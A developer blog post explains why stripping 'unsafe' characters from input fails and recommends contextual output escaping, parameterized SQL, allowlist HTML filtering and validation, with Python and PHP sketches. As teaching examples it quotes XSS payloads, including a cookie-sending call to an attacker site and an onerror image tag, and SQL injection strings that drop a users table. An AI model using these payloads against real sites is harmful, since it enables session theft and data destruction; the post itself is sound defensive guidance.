Don’t try to sanitize input – escape output


February 2020

Every so often developers talk about “sanitizing user input” to prevent cross-site scripting attacks. This is well-intentioned, but leads to a false sense of security, and sometimes mangles perfectly good input.

How does cross-site scripting happen?

A website is vulnerable to cross-site scripting (XSS) attacks if users can enter information that the site repeats back to them verbatim in a page’s HTML. This might cause minor issues (HTML that breaks the page layout) or major ones (JavaScript that sends the user’s login cookie to an attacker’s site).

Let’s walk through a concrete example:

1. NaiveSite allows you to enter your name, which is output as is on your profile page.
2. Billy the Kid enters his name as Billy <script>alert('Yo ho ho!')</script>.
3. Anyone who visits Billy’s profile page gets some HTML including the unescaped script tag, which their browser runs.
4. If the alert() were changed to something more malicious, like sendCookies('https://billy.com/cookie-monster'), Billy may now be collecting the unsuspecting visitor’s login information.
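
To make the walkthrough concrete, here is a minimal sketch of what NaiveSite's profile rendering might look like. It is written in Python purely for illustration; the function name `render_profile_naively` and the surrounding `<h1>` markup are assumptions, not NaiveSite's actual code.

```python
def render_profile_naively(name: str) -> str:
    """Build the profile HTML by pasting the stored name in verbatim (the bug)."""
    return f"<h1>Profile: {name}</h1>"


billy = "Billy <script>alert('Yo ho ho!')</script>"
page = render_profile_naively(billy)

# The script tag reaches the visitor's browser intact:
print(page)  # <h1>Profile: Billy <script>alert('Yo ho ho!')</script></h1>
```

Nothing in this function knows it is producing HTML, so nothing stops the name from becoming markup.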

Side note: it isn’t quite this simple, as login cookies are usually marked HttpOnly, which means they’re not accessible to JavaScript. But this is NaiveSite, so it’s likely they made both an XSS mistake and a cookie one.

Why input filtering isn’t a great idea

The developer has heard of “input filtering” or “sanitizing input”, so they write some code to strip out unsafe HTML characters <>& from the name before storing it. Problem solved!

But there are two problems with this. For one, a couple might sign up to NaiveSite as Bob & Jane Smith, but the filtering code strips the &, and suddenly Bob is on his own, with a middle name of Jane.

Or if the filter is a bit more zealous and also strips ' and ", someone like Bill O’Brien becomes Bill OBrien. Messing up people’s names is not a good look.
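
A rough sketch of such a filter shows the mangling directly. The helper `strip_unsafe` is hypothetical and written in Python for illustration; it stands in for whatever stripping code NaiveSite's developer wrote.

```python
def strip_unsafe(value: str, unsafe: str = "<>&") -> str:
    """Delete every character listed in `unsafe` (the approach being criticized)."""
    return value.translate({ord(ch): None for ch in unsafe})


couple = strip_unsafe("Bob & Jane Smith")
zealous = strip_unsafe("Bill O'Brien", unsafe="<>&'\"")

print(couple)   # Bob  Jane Smith   (the ampersand is gone, leaving a double space)
print(zealous)  # Bill OBrien
```

The data is damaged at the moment it is stored, so there is no way to get the original name back later.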

Perhaps more importantly, it gives a false sense of security. What does “unsafe” mean? In what context? Sure, <>& are unsafe characters for HTML, but what about CSS, JSON, SQL, or even shell scripts? Those have a completely different set of unsafe characters.

For example, NaiveSite might have a PHP template that looks like this:

<html>
...
<script>
var name = "<?=$name?>";
</script>

If an attacker sets their name to include double quotes, like "; badFunc(); ", they can run arbitrary JavaScript on any NaiveSite pages that display the user’s name (which, if you’re logged in, is probably all of them).
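
The sketch below mimics that template in Python to show why an HTML-oriented input filter does nothing here. Both helper names are hypothetical; `render_script_naively` simply reproduces the string pasting that the PHP template performs.

```python
def strip_html_chars(value: str) -> str:
    """Input filter that deletes <, > and &, as NaiveSite's developer wrote it."""
    return value.translate({ord(ch): None for ch in "<>&"})


def render_script_naively(name: str) -> str:
    """Mimic the template: paste the name between double quotes in a script."""
    return f'var name = "{name}";'


payload = '"; badFunc(); "'
stored = strip_html_chars(payload)    # the filter finds nothing to remove
line = render_script_naively(stored)

print(stored == payload)  # True
print(line)               # var name = ""; badFunc(); "";
```

The payload contains none of the characters the filter looks for, yet it closes the string literal and injects a function call.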

Another example of this kind of thing is SQL injection, an attack that’s closely related to cross-site scripting. NaiveSite is powered by MySQL, and it finds users like so:

$query = "SELECT * FROM users WHERE name = '{$name}'";

When a boy named Robert'); DROP TABLE users; comes along, NaiveSite’s entire user database is deleted. Oops!
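
To see what the database actually receives, here is a small Python sketch of the same string building. The function name is hypothetical, and the payload is a variant shaped to fit this particular query's quoting (this template has no parenthesis to close, and the trailing `-- ` starts a SQL comment).

```python
def build_query_naively(name: str) -> str:
    """Splice the name straight into the SQL text, as the PHP line above does."""
    return f"SELECT * FROM users WHERE name = '{name}'"


payload = "Robert'; DROP TABLE users; -- "
sql = build_query_naively(payload)

# The quote in the payload ends the string literal early, and the comment
# marker swallows the template's own closing quote:
print(sql)  # SELECT * FROM users WHERE name = 'Robert'; DROP TABLE users; -- '
```

Whether the second statement runs depends on whether the database driver accepts several statements in one call, but the attacker now controls the structure of the query either way.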

Incidentally, the mother in the xkcd comic says, “I hope you’ve learned to sanitize your database inputs.” Which is somewhat confusing, but I’ll give Randall the benefit of the doubt and assume he meant “escape your database parameters”.

In short, it’s no good to strip out “dangerous characters”, because some characters are dangerous in some contexts and perfectly safe in others.

Escape your output instead

The only code that knows what characters are dangerous is the code that’s outputting in a given context.

So the better approach is to store whatever name the user enters verbatim, and then have the template system HTML-escape when outputting HTML, or properly escape JSON when outputting JSON and JavaScript.
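
As a minimal sketch of that idea, the Python below stores the name untouched and escapes it differently for each output context. The helper names `for_html` and `for_script` are assumptions; a real template system would do this for you.

```python
import html
import json


def for_html(value: str) -> str:
    """Escape for HTML text and attribute values: & < > " ' become entities."""
    return html.escape(value)


def for_script(value: str) -> str:
    """Encode as a JavaScript string literal that is safe inside <script>."""
    literal = json.dumps(value)
    # json.dumps leaves <, > and & alone, so escape them as well; otherwise a
    # value containing "</script>" could end the script block early.
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


print(for_html("Bob & Jane Smith"))                 # Bob &amp; Jane Smith
print("var name = " + for_script('"; badFunc(); "') + ";")
# var name = "\"; badFunc(); \"";
```

The stored value never changes; only its representation does, and each representation is chosen by the code that knows where the value is going.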

And of course use your SQL engine’s parameterized query features, so that values are bound as data (or escaped for you) rather than spliced into the SQL text:

$stmt = $db->prepare('SELECT * FROM users WHERE name = ?');
$stmt->bind_param('s', $name);  // 's' binds $name as a string
$stmt->execute();
$result = $stmt->get_result();
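
The same pattern can be tried end to end without a MySQL server. The sketch below uses Python's built-in sqlite3 module as a stand-in (an assumption made so the example is self-contained); the table layout and the `find_users` helper are hypothetical.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT)")
db.executemany("INSERT INTO users (name) VALUES (?)",
               [("Alice",), ("Bob & Jane Smith",)])


def find_users(name: str) -> list:
    """Look up users by name; the value is bound, never spliced into the SQL."""
    return db.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


hostile = "Robert'; DROP TABLE users; -- "
print(find_users(hostile))             # []  (treated as an odd name, nothing more)
print(find_users("Bob & Jane Smith"))  # [('Bob & Jane Smith',)]
print(db.execute("SELECT COUNT(*) FROM users").fetchone()[0])  # 2
```

The hostile string is compared as plain data, and names containing & or quotes need no special handling.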

This is sometimes called “contextual escaping”. If you happen to use Go’s html/template package, you get automatic contextual escaping for HTML, CSS, and JavaScript. Most other templating systems at least give you automatic HTML escaping, for example React, Jinja2, and Rails templates.

But what if you want raw input?

One tricky situation is when your app’s purpose is allowing a user to enter HTML or Markdown for display. In this case you can’t escape when rendering output, because the whole purpose is to allow users to add links, images, headings, etc.

So you have to take a different approach. If you’re using Markdown, you can either:

1. Allow them to only enter pure Markdown, and convert that to HTML on render (many Markdown libraries allow raw HTML by default; be sure to disable that). This is the most secure option, but also more restrictive.
2. Allow them to use HTML in the Markdown, but only a whitelist of allowed tags and attributes, such as <a href="..."> and <img src="...">. Both Stack Exchange and GitHub take this second approach.

If you’re not using Markdown but want to let your users enter HTML directly, you only have the second option – you must filter using a whitelist. This is harder to get right than you’d think (for example, <img src="x" onerror="badFunc()">), so be sure to use a mature, security-vetted library like DOMPurify.
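
To illustrate what whitelist filtering means, and why the onerror example matters, here is a deliberately small Python sketch built on the standard library's HTML parser. It is not a substitute for a vetted library: the allowed tags, the `AllowlistFilter` class and the `filter_html` function are all hypothetical, and it ignores many real-world concerns such as unbalanced tags.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist: tag name -> attributes that may be kept.
ALLOWED = {"a": {"href"}, "img": {"src"}}
VOID_TAGS = {"img"}  # tags that never get a closing tag


class AllowlistFilter(HTMLParser):
    """Re-emit only allowlisted tags and attributes; escape all text."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown tag: drop it (any text inside is still escaped)
        kept = ""
        for name, value in attrs:
            # Deliberately strict: only absolute http(s) URLs survive, which
            # rejects javascript: URLs (and, as a side effect, relative paths).
            if (name in ALLOWED[tag] and value
                    and value.startswith(("http://", "https://"))):
                kept += f' {name}="{escape(value)}"'
        self.parts.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(escape(data))


def filter_html(raw: str) -> str:
    parser = AllowlistFilter()
    parser.feed(raw)
    parser.close()
    return "".join(parser.parts)


print(filter_html('<img src="https://example.com/cat.png" onerror="badFunc()">'))
# <img src="https://example.com/cat.png">
print(filter_html('<a href="javascript:badFunc()">click</a>'))
# <a>click</a>
```

The output is rebuilt from parsed pieces rather than edited in place, so anything not explicitly allowed never makes it through.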

So in cases where you do need to “echo” raw user input, carefully filter input based on a restrictive whitelist, and store the result in the database. When you come to output it, output it as stored without escaping.

The parallel for SQL injection might be if you’re building a data charting tool that allows users to enter arbitrary SQL queries. You might want to allow them to enter SELECT queries but not data-modification queries. In these cases you’re best off using a proper SQL parser to ensure it’s a well-formed SELECT query – but doing this correctly is not trivial, so be sure to get a security review.

What about validation?

Input sanitization is usually a bad idea, but input validation is a good thing.

For example, when you’re parsing form fields, and you have a number field that’s not a number, or an email address without an @, or a “post status” drop-down that can only be one of draft, published, or archived – then by all means validate it and return an error if it’s invalid.
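
A backend check along those lines might look like the Python sketch below. The field names (`age`, `email`, `status`), the error messages and the `validate_form` function are assumptions made for illustration.

```python
ALLOWED_STATUSES = {"draft", "published", "archived"}


def validate_form(form: dict[str, str]) -> dict[str, str]:
    """Return a field -> message map of errors; an empty dict means valid."""
    errors: dict[str, str] = {}
    try:
        int(form.get("age", ""))
    except ValueError:
        errors["age"] = "Age must be a whole number."
    if "@" not in form.get("email", ""):
        errors["email"] = "Email address must contain an @."
    if form.get("status") not in ALLOWED_STATUSES:
        errors["status"] = "Status must be draft, published, or archived."
    return errors


good = validate_form({"age": "42", "email": "bob@example.com", "status": "draft"})
bad = validate_form({"age": "forty", "email": "nope", "status": "deleted"})

print(good)         # {}
print(sorted(bad))  # ['age', 'email', 'status']
```

Note that validation only accepts or rejects the input. It never rewrites it, which is the key difference from sanitization.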

Good web form validation shows errors inline so the user knows exactly what to fix.

You must do validation at least on the backend, otherwise an attacker could bypass the frontend validation and POST bogus data to your endpoint directly. In addition, you can validate early on the frontend to show errors sooner, without a round trip to the server.

There’s also a Stack Overflow answer to “How can I sanitize user input with PHP?” that is somewhat PHP-specific, but I found it succinct and helpful. It links to a page on PHP magic quotes, which were a bad idea and were removed in PHP 5.4 – the discussion there is very much in line with what I’ve written above.

If you have any feedback on this article, please get in touch!
